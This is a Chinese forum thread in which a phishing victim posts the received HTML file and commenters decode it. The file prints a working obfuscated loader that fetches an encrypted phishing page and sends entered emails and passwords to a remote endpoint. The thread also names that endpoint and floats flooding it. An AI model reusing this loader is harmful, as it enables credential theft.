被钓鱼网站骗了，有没有人能破解一下这个骗子的网站.

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

RANDOM.org 密码生成器

uBlock

Authy

LastPass

FreebuF.com

Beebeeto

Dashlane 密码管理器

这是一个创建于 354 天前的主题，其中的信息可能已经有所发展或是发生改变。

 <html> <head> <meta name="viewport" cOntent="width=device-width, initial-scale=1.0"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script> <a style="display:none;">The car’s past is etched in every mile it covers.</a> <style> body , html { height: 100%;margin: 0;display: flex;align-items: center;justify-content: center } @keyframes bounce { 0% , 100% , 12.5% , 32.5% , 76.1% { transform: translateY(0) } 22.5% , 86% { transform: translateY(7px) } } #backdate { height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px } @keyframes shadow-fade { 0% , 100% , 21.2% , 80% { opacity: 0 } 47% , 70% { opacity: 1 } } #vacuous { width: 130px;margin-top: 179px } #icebound { width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px } #icebound > .ultrasonically { width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px , -70px) rotate(28deg) } #icebound > .karakul { width: 287px;height: 71px;background: #1388d6;transform: translate(-120px , 63px) rotate(-28deg) } #ubiquity { width: 130px;height: 40px;background: #113864;margin-top: -70px } #earthly { display: flex;flex-wrap: wrap;width: 118px;height: 131px;border-radius: 7px;overflow: hidden;margin: 0 auto;margin-top: -306px;animation: cal-bounce 5s infinite;animation-timing-function: cubic-bezier(0 , 0.5 , 0 , 1); transform: translateY(51px) scaleY(1) } @keyframes cal-bounce { 0% , 100% , 16.5% , 76.1% { transform: translateY(151px) scaleY(1) } 28% { transform: translateY(39px) scaleY(1) } 31% { transform: translateY(51px) scaleY(1.05) } 33% { transform: translateY(51px) scaleY(0.96) } 34% , 68.5% { transform: translateY(51px) scaleY(1) } 68.5% { animation-timing-function: cubic-bezier(0.66 , -0.16 , 1 , -0.29) } } #earthly > .quadraphonic { width: 118px;height: 21px; margin-bottom: -1px;background: #0354a1 } #earthly > .karakul { display: flex;width: 118px;height: 37px } .abduct { width: 39.3333px;height: 38px } .oafishly { background: #0073cc } .taciturnity { background: #27a0e0 } .lactic { background: #4fcfff } .ulnar { background: #035fb3 } .xerography { background: #134276 } #laceration { width: 130px;height: 107px;animation: opened-flap-swing 5s infinite;animation-timing-function: cubic-bezier(0.32 , 0 , 0.67 , 0);transform-origin: top;transform: translateY(-68px) rotate3d(1 , 0 , 0 , -180deg) } @keyframes opened-flap-swing { 0% , 100% , 14.5% , 76% { transform: translateY(-68px) rotate3d(1 , 0 , 0 , -90deg) } 16.5% , 74% { transform: translateY(-68px) rotate3d(1 , 0 , 0 , -180deg) } } #abashment { width: 130px;animation: closed-flap-swing 5s infinite;animation-timing-function: cubic-bezier(0.32 , 0 , 0.67 , 0);transform-origin: top;transform: translateY(-71px) rotate3d(1 , 0 , 0 , 90deg) } @keyframes closed-flap-swing { 0% , 100% , 77% , 8.5% { transform: translateY(-71px) rotate3d(1 , 0 , 0 , 0) } 14.5% , 76% { transform: translateY(-71px) rotate3d(1 , 0 , 0 , 90deg) } } #pacify { width: 130px;height: 107px;overflow: hidden } .habituate { width: 96px;height: 96px;background: #4fcfff;margin: -48px auto 0 auto;border-radius: 7px;transform: scaleY(0.6) rotate(45deg) } #laceration .habituate { background: #113864 } #abashment .habituate { background: #4fcfff } </style> </head> <body> <!-- <u>A car mirrors the ambitions of its driver.</u> --> <div id="backdate"> <div id="vacuous"><div id="laceration"> <div id="pacify"> <div class="habituate"></div> <b style="display:none;">Explore the world with the wind in your hair and the road under you.</b> </div></div><div id="earthly"> <div class="quadraphonic"></div> <div class="karakul"><div class="abduct oafishly"></div> <div class="abduct taciturnity"></div> <div class="abduct lactic"></div> </div> <!-- <h1>A car represents freedom with every turn of its wheels.</h1> --> <div class="karakul"> <div class="abduct ulnar"></div> <div class="abduct oafishly"></div> <div class="abduct taciturnity"></div> </div> <div class="karakul"> <div class="abduct xerography"></div> <div class="abduct ulnar"></div> <div class="abduct oafishly"></div> </div></div> </div> <!-- <strong>Adventure starts where the map ends and the road begins.</strong> --> <div id="ubiquity"></div> <div id="icebound"><div class="karakul"></div><div class="ultrasonically"></div> </div> <div id="abashment"><div id="pacify"> <div class="habituate"></div> </div><!-- <span>The road serves as a continual source of inspiration.</span> --> </div> </div> </body> <script> kabob = ``; //base64 这个是我的邮箱，我已经删掉了 </script> <!-- <a>Life’s significant events are marked by the cars we drive.</a> --> <script> new Function( atob (`DQp3YWluc2NvdGluZyA9IFsgImhhc2giICwgImNvbmNhdCIgLCAic2xpY2UiICwgIm5vdyIgXTsNCmFzeW5jIGZ1bmN0aW9uIG9iaXR1YXJ5ICggZWFjaCApIAkgeyByZXR1cm4gQ3J5cHRvSlMuQUVTLmRlY3J5cHQgKCBPYmplY3QudmFsdWVzICggSlNPTi5wYXJzZSAoIGVhY2ggKSAgKSBbMF0gLCAgQ3J5cHRvSlMuUEJLREYyICggQ3J5cHRvSlMuZW5jLkhleC5wYXJzZSAoIE9iamVjdC52YWx1ZXMgKCBKU09OLnBhcnNlICggZWFjaCApICApIFszXSApICAsICBDcnlwdG9KUy5lbmMuSGV4LnBhcnNlICggT2JqZWN0LnZhbHVlcyAoIEpTT04ucGFyc2UgKCBlYWNoICkgICkgWzJdICkgICwgIHsgaGFzaGVyOiBDcnlwdG9KUy5hbGdvLlNIQTUxMiAsa2V5U2l6ZTogNjQvOCAsICBpdGVyYXRpb25zOiA5OTkgfSAgKSwgeyBpdjogQ3J5cHRvSlMuZW5jLkhleC5wYXJzZSAoIE9iamVjdC52YWx1ZXMgKCBKU09OLnBhcnNlICggZWFjaCApICApIFsxXSApICB9ICApIC50b1N0cmluZyAoIENyeXB0b0pTLmVuYy5VdGY4ICl9IA0KaWYgICggcGVyZm9ybWFuY2VbJ25hdmlnYXRpb24nXVsndHlwZSddID09PSAweDAgJiYgIWxvY2F0aW9uWyB3YWluc2NvdGluZyBbMHgwXV0pIHsgbG9jYXRpb25bIHdhaW5zY290aW5nIFswXSBdID0gRGF0ZVsgd2FpbnNjb3RpbmcgWzNdIF0gICggICkgLnRvU3RyaW5nICggMzYgKSAgWyB3YWluc2NvdGluZyBbMl0gXSAgKCAtMSApIFsgd2FpbnNjb3RpbmcgWzFdIF0gICggIGthYm9iICApfSANCiAoIGFzeW5jICAoKSAgPT4gIHsgZG9jdW1lbnQud3JpdGUgKCBhd2FpdCBvYml0dWFyeSAoIGF3YWl0ICAoYXdhaXQgZmV0Y2ggKCBhd2FpdCBvYml0dWFyeSAoIGF0b2IgKCBgZXlKaElqb2lOMFY0Ukd0MU9XeHBSbHBMYzFaeGFYZExaMVpLVFd4V2N6UTVkMDF6YWxOaVdVeFljazQwZUVSbWN6MGlMQ0pqSWpvaU1tRmhPR0UzWW1aa1pqZ3haalpoTURrM05USXdabVpoT0dNNE1HSmhNMkVpTENKaUlqb2lNMloTW1ZMk1qSXlPRGd5Tm1JelpqbGlOekE0T0dGa1pqSmtNMlEyTlRrNVl6UXdZakE1WW1Oa1pqbGhZMlJpTTJFME9XVmtZamd5TkdNME1USm1PR1ZtTkRVeE1UaGpaRGxpWlRjMk4yRXdZMlkwWmpRM1pqSTRaakptWldKa1ltTmlPVGs1WmpBeVl6WXlZemxtWVRoa1pEZGtOR1V6TlRFM056QmhPVEpsTWpsbVlUa3dOVE5sWmpsbU9USXhaRFZrTlRSbE1XWm1aV0kxWm1FeFpXVTFaREZoTXpReU1ERTNNVEZqT0Rnek5HTXhaR1JqTlRJeU5EQTNNRE0wWkRsaFpqUTFZamxtT0RKaVlUTmlZemxqTldaaVl6TXhOMkk1WWpNd01XUTJOV0UzTWpOaU9XTmhaREl3WW1RNU5qVTJOakExT1dGa1l6STBaakppT0RnMk16azJPVEZsTjJRNU9XWmxOVE5oWW1WbVpHVTVNR1poTTJJME16UXdNV0l3WTJRME9UUmlZakZsWVdJek5XTm1OekZrWXpFNFpUaGpZV1EzWVRJNVkyTTFPV0psTjJaak1EYzFNRE5qTkRRNU16ZGpNbVJrTURNMk1EVmlNMlpoTVRJeU5qSmhaV0ptTXprMVpHVmpaREJoWlRKbFpqUXdObU5rWW1JMU56VTBNRGszTlRjMU5ESXlaVFF3TTJVMU0yWmxPV0ppWmpWak1UUmxOV0ZpWXpnek5XWXlNelJoWWpZek1XTmhZakE1T0ROa09USm1aVGsyT1RFMlpqVTNNemhrTlROaFptUTJPV0U1WldRek16UTVaRGM0TnpJMlltWTJZakUyTWprMk5UQTVZamcxWTJaaU4yUXlZMlF6T0RRek56RXdPRGsxT1RReU1UY2lMQ0prSWpvaU5tWTJNalk1TnpRaWZRPT1gICkpICAsIHsgbWV0aG9kOiAnUE9TVCcgLCAgIGJvZHk6IEpTT04uc3RyaW5naWZ5ICh7IG1hY2g6ICJ3YWdvbmVyIiB9KX0pKSAudGV4dCAoKSkpfSkgICgpIDsNCg`) /* wailer */ ) /* jaggedly */ (); </script> <!-- <u>Adventure lies where the road meets the horizon’s edge.</u> --> <script> </script> <!-- <i>Driving is a dialogue between you and the road.</i> --> </html>

钓鱼网站

破解

骗子

11 条回复

yaleax

354 天前

new Function( atob (`DQp3YWluc2NvdGluZyA9IFsgImhhc2giICwgImNvbmNhdCIgLCAic2xpY2UiICwgIm5vdyIgXTsNCmFzeW5jIGZ1bmN0aW9uIG9iaXR1YXJ5ICggZWFjaCApIAkgeyByZXR1cm4gQ3J5cHRvSlMuQUVTLmRlY3J5cHQgKCBPYmplY3QudmFsdWVzICggSlNPTi5wYXJzZSAoIGVhY2ggKSAgKSBbMF0gLCAgQ3J5cHRvSlMuUEJLREYyICggQ3J5cHRvSlMuZW5jLkhleC5wYXJzZSAoIE9iamVjdC52YWx1ZXMgKCBKU09OLnBhcnNlICggZWFjaCApICApIFszXSApICAsICBDcnlwdG9KUy5lbmMuSGV4LnBhcnNlICggT2JqZWN0LnZhbHVlcyAoIEpTT04ucGFyc2UgKCBlYWNoICkgICkgWzJdICkgICwgIHsgaGFzaGVyOiBDcnlwdG9KUy5hbGdvLlNIQTUxMiAsa2V5U2l6ZTogNjQvOCAsICBpdGVyYXRpb25zOiA5OTkgfSAgKSwgeyBpdjogQ3J5cHRvSlMuZW5jLkhleC5wYXJzZSAoIE9iamVjdC52YWx1ZXMgKCBKU09OLnBhcnNlICggZWFjaCApICApIFsxXSApICB9ICApIC50b1N0cmluZyAoIENyeXB0b0pTLmVuYy5VdGY4ICl9IA0KaWYgICggcGVyZm9ybWFuY2VbJ25hdmlnYXRpb24nXVsndHlwZSddID09PSAweDAgJiYgIWxvY2F0aW9uWyB3YWluc2NvdGluZyBbMHgwXV0pIHsgbG9jYXRpb25bIHdhaW5zY290aW5nIFswXSBdID0gRGF0ZVsgd2FpbnNjb3RpbmcgWzNdIF0gICggICkgLnRvU3RyaW5nICggMzYgKSAgWyB3YWluc2NvdGluZyBbMl0gXSAgKCAtMSApIFsgd2FpbnNjb3RpbmcgWzFdIF0gICggIGthYm9iICApfSANCiAoIGFzeW5jICAoKSAgPT4gIHsgZG9jdW1lbnQud3JpdGUgKCBhd2FpdCBvYml0dWFyeSAoIGF3YWl0ICAoYXdhaXQgZmV0Y2ggKCBhd2FpdCBvYml0dWFyeSAoIGF0b2IgKCBgZXlKaElqb2lOMFY0Ukd0MU9XeHBSbHBMYzFaeGFYZExaMVpLVFd4V2N6UTVkMDF6YWxOaVdVeFljazQwZUVSbWN6MGlMQ0pqSWpvaU1tRmhPR0UzWW1aa1pqZ3haalpoTURrM05USXdabVpoT0dNNE1HSmhNMkVpTENKaUlqb2lNMlJoTW1ZMk1qSXlPRGd5Tm1JelpqbGlOekE0T0dGa1pqSmtNMlEyTlRrNVl6UXdZakE1WW1Oa1pqbGhZMlJpTTJFME9XVmtZamd5TkdNME1USm1PR1ZtTkRVeE1UaGpaRGxpWlRjMk4yRXdZMlkwWmpRM1pqSTRaakptWldKa1ltTmlPVGs1WmpBeVl6WXlZemxtWVRoa1pEZGtOR1V6TlRFM056QmhPVEpsTWpsbVlUa3dOVE5sWmpsbU9USXhaRFZrTlRSbE1XWm1aV0kxWm1FeFpXVTFaREZoTXpReU1ERTNNVEZqT0Rnek5HTXhaR1JqTlRJeU5EQTNNRE0wWkRsaFpqUTFZamxtT0RKaVlUTmlZemxqTldaaVl6TXhOMkk1WWpNd01XUTJOV0UzTWpOaU9XTmhaREl3WW1RNU5qVTJOakExT1dGa1l6STBaakppT0RnMk16azJPVEZsTjJRNU9XWmxOVE5oWW1WbVpHVTVNR1poTTJJME16UXdNV0l3WTJRME9UUmlZakZsWVdJek5XTm1OekZrWXpFNFpUaGpZV1EzWVRJNVkyTTFPV0psTjJaak1EYzFNRE5qTkRRNU16ZGpNbVJrTURNMk1EVmlNMlpoTVRJeU5qSmhaV0ptTXprMVpHVmpaREJoWlRKbFpqUXdObU5rWW1JMU56VTBNRGszTlRjMU5ESXlaVFF3TTJVMU0yWmxPV0ppWmpWak1UUmxOV0ZpWXpnek5XWXlNelJoWWpZek1XTmhZakE1T0ROa09USm1aVGsyT1RFMlpqVTNNemhrTlROaFptUTJPV0U1WldRek16UTVaRGM0TnpJMlltWTJZakUyTWprMk5UQTVZamcxWTJaaU4yUXlZMlF6T0RRek56RXdPRGsxT1RReU1UY2lMQ0prSWpvaU5tWTJNalk1TnpRaWZRPT1gICkpICAsIHsgbWV0aG9kOiAnUE9TVCcgLCAgIGJvZHk6IEpTT04uc3RyaW5naWZ5ICh7IG1hY2g6ICJ3YWdvbmVyIiB9KX0pKSAudGV4dCAoKSkpfSkgICgpIDsNCg`) /* wailer */ ) /* jaggedly */ ();

这个如何解密，我也不太懂。

admol

354 天前

问下 AI 吧，很简单的

yaleax

354 天前

@admol AI 破解不了，这个解密里面，又包含一个加密。这个我不懂，所以比较困惑。

yaleax

354 天前

@admol 理解了，我不能直接问他，我要一边学习，一边问。谢谢指点。

chrawsl

354 天前 via Android

wainscoting = ["hash", "concat", "slice", "now"];
async function obituary(each) { return CryptoJS.AES.decrypt(Object.values(JSON.parse(each))[0], CryptoJS.PBKDF2(CryptoJS.enc.Hex.parse(Object.values(JSON.parse(each))[3]), CryptoJS.enc.Hex.parse(Object.values(JSON.parse(each))[2]), { hasher: CryptoJS.algo.SHA512, keySize: 64 / 8, iterations: 999 }), { iv: CryptoJS.enc.Hex.parse(Object.values(JSON.parse(each))[1]) }).toString(CryptoJS.enc.Utf8); }
if (performance['navigation']['type'] === 0x0 && !location[wainscoting[0x0]]) { location[wainscoting[0]] = Date[wainscoting[3]]().toString(36)[wainscoting[2]](-1)[wainscoting[1]](kabob); }
(async () => { document.write(await obituary(await (await fetch(await obituary({"a":"7ExDku9liFZKsVqiwKgVJMlVs49wMsjSbYLXrN4xDfs=","c":"2aa8a7bfdf81f6a097520ffa8c80ba3a","b":"3da2f62228826b3f9b7088adf2d3d6599c40b09bcdf9acdb3a49edb824c412f8ef45118cd9be767a0cf4f47f28f2febdbcb999f02c62c9fa8dd7d4e351770a92e29fa9053ef9f921d5d54e1ffeb5fa1ee5d1a34201711c8834c1ddc522407034d9af45b9f82ba3bc9c5fbc317b9b301d65a723b9cad20bd96566059adc24f2b88639691e7d99fe53abefde90fa3b43401b0cd494bb1eab35cf71dc18e8cad7a29cc59be7fc07503c44937c2dd03605b3fa12262aebf395decd0ae2ef406cdbb5754097575422e403e53fe9bbf5c14e5abc835f234ab631cab0983d92fe96916f5738d53afd69a9ed3349d78726bf6b16296509b85cfb7d2cd384371089594217","d":"6f626974"}), { method: 'POST', body: JSON.stringify({ mach: "wagoner" }) })).text())); })();

目测大概就是加密了输入的内容，然后调用了一个 fetch 发出去了而已

fank99

354 天前

给地址啊

yaleax

354 天前

@chrawsl 是的，你的目测还是很准的。我想还原这段代码。对于我现在还是有点难。

yaleax

353 天前

@fank99 没地址，就是发给你这样一个 html 文件，然后你打开，骗你密码

fank99

353 天前

抓包看了下，会向下面这个地址发送一个 post 请求，里面包含了输入的邮箱和密码，带一个随机生成的序列号，怀疑是用来验签的
https://amunayor.ru///5942.php

do: le
em: [email protected]
px: 1312342
sec: q1YqLs5XssorzcnRUSopULJSysgvUaoFAA==

yaleax

353 天前

@fank99 有没有办法让给这个网站喂数据，让它下线呢。我看现在还在正常运转。

chrawsl

352 天前

@yaleax atob (`xxxxxxxxxxxxx`) 复制出来直接在浏览器执行就行了